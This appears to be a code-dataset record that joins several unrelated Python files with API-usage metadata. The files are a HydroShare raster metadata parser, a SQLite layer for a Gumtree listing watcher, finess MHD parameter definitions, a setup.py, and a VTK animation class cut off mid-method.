    Recognized keys: name, northlimit, eastlimit, southlimit, westlimit,
    units, projection.  Unknown keys are ignored; limit values must parse
    as floats or a GenericResourceMeta.ResourceMetaException is raised.
    """
    def __init__(self, value_str=None):
        """Initialize every field to None, then parse value_str if given.

        Bug fix: the class previously defined *two* __init__ methods; the
        second (parsing) one silently shadowed the first (defaults) one, so
        any key missing from value_str left its attribute undefined and
        __str__ raised AttributeError.  Merging them restores the defaults
        for every construction path.

        :param value_str: semicolon-separated 'key=value' pairs, or None.
        """
        self.name = None
        self.northlimit = None
        self.eastlimit = None
        self.southlimit = None
        self.westlimit = None
        self.units = None
        self.projection = None  # Optional
        if value_str is None:
            return
        kvp = value_str.split(';')
        for pair in kvp:
            (key, value) = pair.split('=')
            key = key.strip()
            value = value.strip()
            if key == 'name':
                self.name = value
            elif key == 'eastlimit':
                try:
                    self.eastlimit = float(value)
                except Exception as e:
                    msg = "Unable to parse east limit {0}, error: {1}".format(value,
                                                                              str(e))
                    raise GenericResourceMeta.ResourceMetaException(msg)
            elif key == 'northlimit':
                try:
                    self.northlimit = float(value)
                except Exception as e:
                    msg = "Unable to parse north limit {0}, error: {1}".format(value,
                                                                               str(e))
                    raise GenericResourceMeta.ResourceMetaException(msg)
            elif key == 'southlimit':
                try:
                    self.southlimit = float(value)
                except Exception as e:
                    msg = "Unable to parse south limit {0}, error: {1}".format(value,
                                                                               str(e))
                    raise GenericResourceMeta.ResourceMetaException(msg)
            elif key == 'westlimit':
                try:
                    self.westlimit = float(value)
                except Exception as e:
                    msg = "Unable to parse west limit {0}, error: {1}".format(value,
                                                                              str(e))
                    raise GenericResourceMeta.ResourceMetaException(msg)
            elif key == 'units':
                self.units = value
            elif key == 'projection':
                self.projection = value

    def __str__(self):
        msg = "SpatialReference northlimit: {northlimit}, "
        msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
        msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
        msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
                         southlimit=self.southlimit, westlimit=self.westlimit,
                         units=self.units, projection=self.projection)
        return msg

    def __unicode__(self):
        return unicode(str(self))
class RasterResourceSAXHandler(xml.sax.ContentHandler):
    """SAX handler that collects hsterms:BandInformation elements.

    Each band is represented by a RasterResourceMeta.BandInformation object
    appended to self.band_info; the per-band child elements (name,
    variableName, variableUnit, method, comment) are accumulated from
    character data and assigned when their closing tags are seen.

    Refactoring note: the original implementation duplicated the same
    open/collect/close state machine five times (one copy per field).  The
    field handling is now table-driven; error messages are unchanged.
    """
    # Ordered (element qname, BandInformation attribute, human-readable
    # description) triples.  Order matters: characters() routes content to
    # the first currently-open field, mirroring the original elif chain.
    _FIELDS = [
        ('hsterms:name', 'name', 'name'),
        ('hsterms:variableName', 'variableName', 'variable name'),
        ('hsterms:variableUnit', 'variableUnit', 'variable unit'),
        ('hsterms:method', 'method', 'method'),
        ('hsterms:comment', 'comment', 'comment'),
    ]

    def __init__(self):
        xml.sax.ContentHandler.__init__(self)
        # Content: one entry per hsterms:BandInformation element encountered.
        self.band_info = []
        # State: inside a hsterms:BandInformation element?
        self._get_bandinfo = False
        # State: inside the rdf:Description child of a band element?
        self._get_bandinfo_details = False
        # Maps an open field element's qname to the list of character chunks
        # collected for it so far; absence of a key means the field is closed.
        self._open_fields = {}

    def characters(self, content):
        """Accumulate character data for whichever band field is open."""
        for qname, attr, description in self._FIELDS:
            if qname in self._open_fields:
                if len(self.band_info) < 1:
                    msg = "Error: haven't yet encountered band information, "
                    msg += "yet trying to store band information {0}.".format(description)
                    raise xml.sax.SAXException(msg)
                self._open_fields[qname].append(content)
                break

    def startElement(self, name, attrs):
        if name == 'hsterms:BandInformation':
            if self._get_bandinfo:
                raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
            self._get_bandinfo = True
        elif name == 'rdf:Description':
            if self._get_bandinfo:
                if self._get_bandinfo_details:
                    msg = "Error: nested rdf:Description elements " \
                          "within hsterms:BandInformation element."
                    raise xml.sax.SAXException(msg)
                # Create new band info
                self.band_info.append(RasterResourceMeta.BandInformation())
                self._get_bandinfo_details = True
        elif self._get_bandinfo_details:
            for qname, attr, description in self._FIELDS:
                if name == qname:
                    if qname in self._open_fields:
                        raise xml.sax.SAXException("Error: nested {0} elements "
                                                   "within hsterms:BandInformation.".format(qname))
                    self._open_fields[qname] = []
                    break

    def endElement(self, name):
        if name == 'hsterms:BandInformation':
            if not self._get_bandinfo:
                msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
                raise xml.sax.SAXException(msg)
            self._get_bandinfo = False
        elif name == 'rdf:Description':
            if self._get_bandinfo:
                if not self._get_bandinfo_details:
                    msg = "Error: close rdf:Description tag without corresponding open tag "
                    msg += "within hsterms:BandInformation."
                    raise xml.sax.SAXException(msg)
                self._get_bandinfo_details = False
        elif self._get_bandinfo_details:
            for qname, attr, description in self._FIELDS:
                if name == qname:
                    if qname not in self._open_fields:
                        msg = "Error: close {0} tag without corresponding open tag ".format(qname)
                        msg += "within hsterms:BandInformation."
                        raise xml.sax.SAXException(msg)
                    # Join the collected chunks and store them on the most
                    # recently opened band.
                    setattr(self.band_info[-1], attr, "".join(self._open_fields.pop(qname)))
                    break
| [
"rdflib.namespace.Namespace",
"hs_core.serialization.GenericResourceMeta.ResourceMetaException"
] | [((876, 934), 'rdflib.namespace.Namespace', 'rdflib.namespace.Namespace', (['"""http://hydroshare.org/terms/"""'], {}), "('http://hydroshare.org/terms/')\n", (902, 934), False, 'import rdflib\n'), ((1387, 1433), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (1428, 1433), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((1758, 1804), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (1799, 1804), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((2149, 2195), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (2190, 2195), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((2593, 2639), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (2634, 2639), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((3044, 3090), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (3085, 3090), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((3491, 3537), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (3532, 3537), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((6339, 6385), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (6380, 6385), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((4525, 4571), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (4566, 
4571), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((4939, 4985), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (4980, 4985), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((5364, 5410), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (5405, 5410), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((11907, 11953), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (11948, 11953), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((12330, 12376), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (12371, 12376), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((12753, 12799), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (12794, 12799), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((13172, 13218), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (13213, 13218), False, 'from hs_core.serialization import GenericResourceMeta\n')] |
import os
import os.path
import sqlite3
import logging
from typing import List
from gumtree_watchdog.types import Listing, Contract, ListingWithChatId
# Alias used in type hints throughout this module.
TConn = sqlite3.Connection
# Path to the SQLite database file, read from the GUMTREE_DB environment
# variable at import time (None when the variable is unset; get_connection
# raises in that case).
DB_PATH = os.environ.get('GUMTREE_DB')
def get_connection() -> TConn:
    """Open a connection to the configured SQLite database.

    Rows are returned as sqlite3.Row so columns are addressable by name.
    Raises Exception when the GUMTREE_DB environment variable was not set.
    """
    if DB_PATH:
        connection = sqlite3.connect(DB_PATH)
        connection.row_factory = sqlite3.Row
        return connection
    raise Exception("Please specify Sqlite3 db path as environment variable GUMTREE_DB")
def initialize():
    """Create the schema on first run; no-op when the database file exists."""
    if os.path.isfile(DB_PATH):
        logging.info("Sqlite3 database found.")
        return
    logging.warning("Sqlite3 database not found, will initialize.")
    # DDL statements, executed in order (listing references contract).
    ddl_statements = (
        """
        CREATE TABLE contract(
            contract_id integer primary key autoincrement,
            query text not null,
            chat_id integer not null,
            is_active bool default 0,
            UNIQUE(chat_id, query)
        );
        """,
        """
        CREATE TABLE listing(
            listing_id integer primary key autoincrement,
            contract_id integer not null,
            ad_id text not null,
            title text not null,
            description text not null,
            url text,
            must_notify_user bool default 1,
            FOREIGN KEY(contract_id) REFERENCES contract(contract_id),
            UNIQUE(contract_id, ad_id)
        );
        """,
        """
        CREATE TABLE inbound_msg(
            inbound_msg_id integer primary key autoincrement,
            chat_id integer not null,
            message text not null
        );
        """,
    )
    with get_connection() as conn:
        for statement in ddl_statements:
            conn.execute(statement)
def insert_inbound_msg(conn: TConn, chat_id: int, message: str):
    """Record a raw inbound chat message for auditing."""
    parameters = {"chat_id": chat_id, "message": message}
    conn.execute(
        "INSERT INTO inbound_msg (chat_id, message) VALUES (:chat_id, :message)",
        parameters,
    )
def insert_contract(conn: TConn, chat_id: int, query: str) -> int:
    """Create a watch contract for a chat and return its new row id."""
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO contract (chat_id, query) VALUES (:chat_id, :query)",
        {"chat_id": chat_id, "query": query},
    )
    return cursor.lastrowid
def insert_listing(conn: TConn, record: Listing) -> bool:
    """Insert a scraped listing unless this contract already has the ad.

    Returns True when a new row was written, False for a duplicate
    (same contract_id + ad_id).
    """
    duplicates = conn.execute(
        """
        SELECT listing_id
        FROM listing
        WHERE contract_id = :contract_id AND ad_id = :ad_id
        """,
        {"contract_id": record.contract_id, "ad_id": record.ad_id},
    ).fetchall()
    if duplicates:
        return False
    conn.execute(
        """
        INSERT INTO listing
        (contract_id, ad_id, url, title, description)
        VALUES
        (:contract_id, :ad_id, :url, :title, :description)
        """,
        {
            "contract_id": record.contract_id,
            "ad_id": record.ad_id,
            "url": record.url,
            "title": record.title,
            "description": record.description,
        },
    )
    return True
def get_open_contracts(conn: TConn) -> List[Contract]:
    """Return every contract currently marked active."""
    rows = conn.execute(
        "SELECT * FROM contract WHERE is_active = 1;"
    ).fetchall()
    return [Contract(**row) for row in rows]
def get_open_contracts_for_user(conn: TConn, chat_id: int) -> List[Contract]:
    """Return the active contracts belonging to one chat."""
    rows = conn.execute(
        """
        SELECT *
        FROM contract
        WHERE is_active = 1
        AND chat_id = :chat_id
        """,
        {"chat_id": chat_id},
    ).fetchall()
    return [Contract(**row) for row in rows]
def get_unsent_listing_notifications(conn: TConn) -> List[ListingWithChatId]:
    """Return listings still awaiting user notification, joined with the
    chat id of their (active) contract."""
    rows = conn.execute(
        """
        SELECT listing_id, ad_id, chat_id, url, title, description
        FROM listing
        JOIN contract USING (contract_id)
        WHERE must_notify_user = 1
        AND contract.is_active = 1
        """
    ).fetchall()
    return [ListingWithChatId(**row) for row in rows]
def mark_listing_as_sent(conn: TConn, listing_id: int):
    """Clear the pending-notification flag on one listing.

    Returns the cursor from the UPDATE, as the original did.
    """
    update_sql = "UPDATE listing SET must_notify_user = 0 WHERE listing_id = :listing_id"
    return conn.execute(update_sql, {"listing_id": listing_id})
def deactivate_contract(conn: TConn, chat_id: int, contract_id: int):
    """Deactivate a contract, but only if it belongs to the given chat.

    The chat_id predicate prevents one user from disabling another user's
    contract; when no row matches, this is a no-op.

    Fix: chat_id was annotated as str, inconsistent with every other
    function in this module (insert_contract, get_open_contracts_for_user,
    insert_inbound_msg), which all treat chat_id as int.
    """
    conn.execute(
        """
        UPDATE contract
        SET is_active = 0
        WHERE contract_id = :contract_id
        AND chat_id = :chat_id
        """,
        {"contract_id": contract_id, "chat_id": chat_id},
    )
def mark_contract_active(conn: TConn, contract_id: int):
    """Activate a contract.

    Listings gathered before (re)activation are marked already-notified
    first, so the user is not flooded with stale results.
    """
    conn.execute(
        "UPDATE listing SET must_notify_user = 0 WHERE contract_id = :contract_id",
        {"contract_id": contract_id},
    )
    conn.execute(
        "UPDATE contract SET is_active = 1 WHERE contract_id = :contract_id",
        {"contract_id": contract_id},
    )
| [
"sqlite3.connect",
"gumtree_watchdog.types.ListingWithChatId",
"logging.warning",
"os.environ.get",
"os.path.isfile",
"gumtree_watchdog.types.Contract",
"logging.info"
] | [((189, 217), 'os.environ.get', 'os.environ.get', (['"""GUMTREE_DB"""'], {}), "('GUMTREE_DB')\n", (203, 217), False, 'import os\n'), ((375, 399), 'sqlite3.connect', 'sqlite3.connect', (['DB_PATH'], {}), '(DB_PATH)\n', (390, 399), False, 'import sqlite3\n'), ((478, 501), 'os.path.isfile', 'os.path.isfile', (['DB_PATH'], {}), '(DB_PATH)\n', (492, 501), False, 'import os\n'), ((571, 634), 'logging.warning', 'logging.warning', (['"""Sqlite3 database not found, will initialize."""'], {}), "('Sqlite3 database not found, will initialize.')\n", (586, 634), False, 'import logging\n'), ((511, 550), 'logging.info', 'logging.info', (['"""Sqlite3 database found."""'], {}), "('Sqlite3 database found.')\n", (523, 550), False, 'import logging\n'), ((3204, 3217), 'gumtree_watchdog.types.Contract', 'Contract', ([], {}), '(**_)\n', (3212, 3217), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n'), ((3538, 3551), 'gumtree_watchdog.types.Contract', 'Contract', ([], {}), '(**_)\n', (3546, 3551), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n'), ((3945, 3967), 'gumtree_watchdog.types.ListingWithChatId', 'ListingWithChatId', ([], {}), '(**_)\n', (3962, 3967), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n')] |
#section [initial]
def _parameters_accessors_checks():
    """Build the Parameter/Accessor/Check lists for the [initial] section.

    The section describes a left ('l') and right ('r') Riemann state, each
    with density (rho), velocity components (un, ut, u3), pressure (p) and
    magnetic-field components (Bn, Bt, B3) -- all doubles.  Density and
    pressure must be strictly positive.

    Refactoring note: the original spelled out sixteen identical
    Parameter(...) blocks by hand; they are now generated from a spec
    table.  Parameter and check ordering is preserved exactly
    (rhol..B3l, rhor..B3r; checks rhol, pl, rhor, pr).

    Returns:
        (parameters, accessors, checks) -- accessors is produced with
        map() to preserve the original return type.
    """
    from finess.params import Parameter, Accessor, CheckGreaterThan

    # (base variable name, must the value be strictly positive?)
    variable_specs = [("rho", True),
                      ("un", False),
                      ("ut", False),
                      ("u3", False),
                      ("p", True),
                      ("Bn", False),
                      ("Bt", False),
                      ("B3", False)]

    parameters = []
    checks = []
    for side in ("l", "r"):
        for base, must_be_positive in variable_specs:
            name = base + side
            parameter = Parameter(variable_name=name,
                                  section="initial",
                                  name=name,
                                  type_="double")
            parameters.append(parameter)
            if must_be_positive:
                checks.append(CheckGreaterThan(parameter, 0.0))

    return parameters, map(Accessor, parameters), checks
# Module-level parameter metadata for the [initial] section, built once at
# import time and consumed by the finess parameter machinery.
parameter_list, accessor_list, check_list = \
    _parameters_accessors_checks()
| [
"finess.params.CheckGreaterThan",
"finess.params.Parameter"
] | [((280, 359), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""rhol"""', 'section': '"""initial"""', 'name': '"""rhol"""', 'type_': '"""double"""'}), "(variable_name='rhol', section='initial', name='rhol', type_='double')\n", (289, 359), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((521, 598), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""unl"""', 'section': '"""initial"""', 'name': '"""unl"""', 'type_': '"""double"""'}), "(variable_name='unl', section='initial', name='unl', type_='double')\n", (530, 598), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((709, 786), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""utl"""', 'section': '"""initial"""', 'name': '"""utl"""', 'type_': '"""double"""'}), "(variable_name='utl', section='initial', name='utl', type_='double')\n", (718, 786), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((897, 974), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""u3l"""', 'section': '"""initial"""', 'name': '"""u3l"""', 'type_': '"""double"""'}), "(variable_name='u3l', section='initial', name='u3l', type_='double')\n", (906, 974), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1084, 1159), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""pl"""', 'section': '"""initial"""', 'name': '"""pl"""', 'type_': '"""double"""'}), "(variable_name='pl', section='initial', name='pl', type_='double')\n", (1093, 1159), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1311, 1388), 'finess.params.Parameter', 'Parameter', ([], 
{'variable_name': '"""Bnl"""', 'section': '"""initial"""', 'name': '"""Bnl"""', 'type_': '"""double"""'}), "(variable_name='Bnl', section='initial', name='Bnl', type_='double')\n", (1320, 1388), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1499, 1576), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Btl"""', 'section': '"""initial"""', 'name': '"""Btl"""', 'type_': '"""double"""'}), "(variable_name='Btl', section='initial', name='Btl', type_='double')\n", (1508, 1576), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1687, 1764), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""B3l"""', 'section': '"""initial"""', 'name': '"""B3l"""', 'type_': '"""double"""'}), "(variable_name='B3l', section='initial', name='B3l', type_='double')\n", (1696, 1764), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1876, 1955), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""rhor"""', 'section': '"""initial"""', 'name': '"""rhor"""', 'type_': '"""double"""'}), "(variable_name='rhor', section='initial', name='rhor', type_='double')\n", (1885, 1955), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2117, 2194), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""unr"""', 'section': '"""initial"""', 'name': '"""unr"""', 'type_': '"""double"""'}), "(variable_name='unr', section='initial', name='unr', type_='double')\n", (2126, 2194), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2305, 2382), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""utr"""', 'section': 
'"""initial"""', 'name': '"""utr"""', 'type_': '"""double"""'}), "(variable_name='utr', section='initial', name='utr', type_='double')\n", (2314, 2382), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2493, 2570), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""u3r"""', 'section': '"""initial"""', 'name': '"""u3r"""', 'type_': '"""double"""'}), "(variable_name='u3r', section='initial', name='u3r', type_='double')\n", (2502, 2570), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2680, 2755), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""pr"""', 'section': '"""initial"""', 'name': '"""pr"""', 'type_': '"""double"""'}), "(variable_name='pr', section='initial', name='pr', type_='double')\n", (2689, 2755), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2907, 2984), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Bnr"""', 'section': '"""initial"""', 'name': '"""Bnr"""', 'type_': '"""double"""'}), "(variable_name='Bnr', section='initial', name='Bnr', type_='double')\n", (2916, 2984), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((3095, 3172), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Btr"""', 'section': '"""initial"""', 'name': '"""Btr"""', 'type_': '"""double"""'}), "(variable_name='Btr', section='initial', name='Btr', type_='double')\n", (3104, 3172), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((3283, 3360), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""B3r"""', 'section': '"""initial"""', 'name': '"""B3r"""', 'type_': 
'"""double"""'}), "(variable_name='B3r', section='initial', name='B3r', type_='double')\n", (3292, 3360), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((477, 504), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['rhol', '(0.0)'], {}), '(rhol, 0.0)\n', (493, 504), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1269, 1294), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['pl', '(0.0)'], {}), '(pl, 0.0)\n', (1285, 1294), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2073, 2100), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['rhor', '(0.0)'], {}), '(rhor, 0.0)\n', (2089, 2100), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2865, 2890), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['pr', '(0.0)'], {}), '(pr, 0.0)\n', (2881, 2890), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n')] |
from setuptools import setup
import os
# Long description for PyPI comes straight from the README.
with open("README.md", "r", encoding="utf-8") as readme:
    long_description = readme.read()

# Runtime dependencies: one requirement per non-empty line of
# requirements.txt, when that file exists.
requirements = []
if os.path.isfile("./requirements.txt"):
    with open("requirements.txt", "r") as req_file:
        requirements = [line for line in req_file.read().split("\n") if line != ""]
# Distribution metadata consumed by pip/setuptools (sdist and wheel builds).
setup(
    name="ma5_expert",
    version="0.0.1",
    # Short summary shown on PyPI.
    description=("MadAnalysis 5 interpreter for Expert mode"),
    # Rendered README (read above) becomes the PyPI long description.
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/jackaraz/ma5_expert",
    author="<NAME>",
    author_email=("<EMAIL>"),
    license="MIT",
    packages=[
        "ma5_expert",
        "ma5_expert.CutFlow",
        "ma5_expert.tools",
    ],
    # Parsed from requirements.txt above (empty when the file is absent).
    install_requires=requirements,
    python_requires=">=3.6",
    classifiers=[
        "Intended Audience :: Science/Research",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Topic :: Scientific/Engineering :: Physics",
    ],
)
| [
"os.path.isfile",
"setuptools.setup"
] | [((146, 182), 'os.path.isfile', 'os.path.isfile', (['"""./requirements.txt"""'], {}), "('./requirements.txt')\n", (160, 182), False, 'import os\n'), ((330, 1000), 'setuptools.setup', 'setup', ([], {'name': '"""ma5_expert"""', 'version': '"""0.0.1"""', 'description': '"""MadAnalysis 5 interpreter for Expert mode"""', 'long_description': 'long_description', 'long_description_content_type': '"""text/markdown"""', 'url': '"""https://github.com/jackaraz/ma5_expert"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['ma5_expert', 'ma5_expert.CutFlow', 'ma5_expert.tools']", 'install_requires': 'requirements', 'python_requires': '""">=3.6"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Physics']"}), "(name='ma5_expert', version='0.0.1', description=\n 'MadAnalysis 5 interpreter for Expert mode', long_description=\n long_description, long_description_content_type='text/markdown', url=\n 'https://github.com/jackaraz/ma5_expert', author='<NAME>', author_email\n ='<EMAIL>', license='MIT', packages=['ma5_expert', 'ma5_expert.CutFlow',\n 'ma5_expert.tools'], install_requires=requirements, python_requires=\n '>=3.6', classifiers=['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Physics'])\n", (335, 1000), False, 'from setuptools import setup\n')] |
import time
import numpy as np
import vtk
from vtk.util import numpy_support
from svtk.lib.toolbox.integer import minmax
from svtk.lib.toolbox.idarray import IdArray
from svtk.lib.toolbox.numpy_helpers import normalize
import math as m
class VTKAnimationTimerCallback(object):
"""This class is called every few milliseconds by VTK based on the set frame rate. This allows for animation.
I've added several modification functions, such as adding and deleting lines/points, changing colors, etc."""
# Per-instance attributes (no __dict__).  Fix: the original list was missing
# a comma after "line_id_array", which silently concatenated it with
# "last_velocity_update" into the junk slot "line_id_arraylast_velocity_update";
# both real names only worked because they were (accidentally) duplicated
# further down the list, as was "renderer".  Duplicates removed.
__slots__ = ["points", "point_colors", "timer_count", "points_poly",
             "lines", "lines_poly", "line_colors", "line_id_array",
             "last_velocity_update", "unused_locations",
             "last_color_velocity_update", "renderer", "last_bg_color_velocity_update",
             "_loop_time", "remaining_lerp_fade_time", "lerp_multiplier",
             "point_id_array", "point_vertices", "interactor_style",
             "interactive_renderer", "_started"
             ]
def __init__(self):
    # Number of timer ticks processed so far.
    self.timer_count = 0
    # Timestamps of the last update of each kind; other methods presumably
    # diff against these to compute per-frame deltas.
    # NOTE(review): time.clock() was removed in Python 3.8 (and measured CPU
    # time, not wall time, on Unix).  Migrating to time.perf_counter() should
    # be done for the whole class in one sweep -- changing only this method
    # would mix incompatible clocks.
    self.last_velocity_update = time.clock()
    self.last_color_velocity_update = time.clock()
    self.last_bg_color_velocity_update = time.clock()
    self._loop_time = time.clock()
    # Memory locations freed by deletions, available for reuse.
    self.unused_locations = []
    # Time remaining for lerped (interpolated) fades, scaled by the multiplier.
    self.remaining_lerp_fade_time = 0
    self.lerp_multiplier = 1
    # Id bookkeeping for lines and points (project-local IdArray helper).
    self.line_id_array = IdArray()
    self.point_id_array = IdArray()
    # Becomes True once animation has started (managed elsewhere).
    self._started=False
def add_lines(self, lines, line_colors):
    """
    Adds multiple lines between any sets of points.

    Args:
        lines (list, tuple, np.ndarray, np.generic):
            An array in the format of [2, point_a, point_b, 2, point_c, point_d, ...]. The two is needed for VTK's
            lines.
        line_colors (list, tuple, np.ndarray, np.generic):
            An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
            lines.

    Returns:
        list: An array containing the memory locations of each of the newly inserted lines.
    """
    assert (isinstance(lines, (list, tuple, np.ndarray, np.generic)))
    assert (isinstance(line_colors, (list, tuple, np.ndarray, np.generic)))

    # Pull the current cell and color arrays out of VTK as numpy arrays.
    np_line_data = numpy_support.vtk_to_numpy(self.lines.GetData())
    np_line_color_data = numpy_support.vtk_to_numpy(self.line_colors)

    # todo: add lines in unused locations if possible
    # Each VTK line cell occupies 3 ids (count, point_a, point_b), so a
    # line's cell index is its offset into the id array divided by 3.
    # NOTE(review): on Python 3 this is a range object, not the list the
    # docstring promises -- callers needing list semantics must wrap it.
    mem_locations = range(int(len(np_line_data) / 3), int((len(np_line_data) + len(lines)) / 3))

    np_line_data = np.append(np_line_data, lines)

    # np.append with axis=0 requires a non-empty base array, hence the branch.
    if len(np_line_color_data) > 0:
        np_line_color_data = np.append(np_line_color_data, line_colors, axis=0)
    else:
        np_line_color_data = line_colors

    # deep=True makes VTK copy the data so the temporary numpy arrays can
    # be garbage collected safely.
    vtk_line_data = numpy_support.numpy_to_vtkIdTypeArray(np_line_data, deep=True)
    self.lines.SetCells(int(len(np_line_data) / 3), vtk_line_data)

    vtk_line_color_data = numpy_support.numpy_to_vtk(num_array=np_line_color_data,
                                                     deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
    self.line_colors.DeepCopy(vtk_line_color_data)

    self.lines_poly.Modified()

